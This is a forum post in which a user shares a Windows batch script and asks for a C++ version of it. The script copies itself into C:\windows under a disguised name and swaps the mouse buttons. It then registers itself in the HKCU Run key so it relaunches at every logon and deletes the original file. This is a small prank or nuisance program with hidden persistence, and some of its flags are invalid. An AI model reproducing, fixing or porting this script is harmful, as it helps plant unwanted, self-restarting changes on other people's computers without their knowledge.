I made a batch file to edit the registryo on my computer.
How would this code look in C++?
the spacing kind of got screwed up when i pasted it, I would really appreciate any help on this subject.Code:copy swap.bat "C:\windows\snaplecrackle.bat" /y reg add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v snaplecrackle /t REG_SZ /d C:\windows\snaplecrackle.bat /y del swap.bat /y



LinkBack URL
About LinkBacks


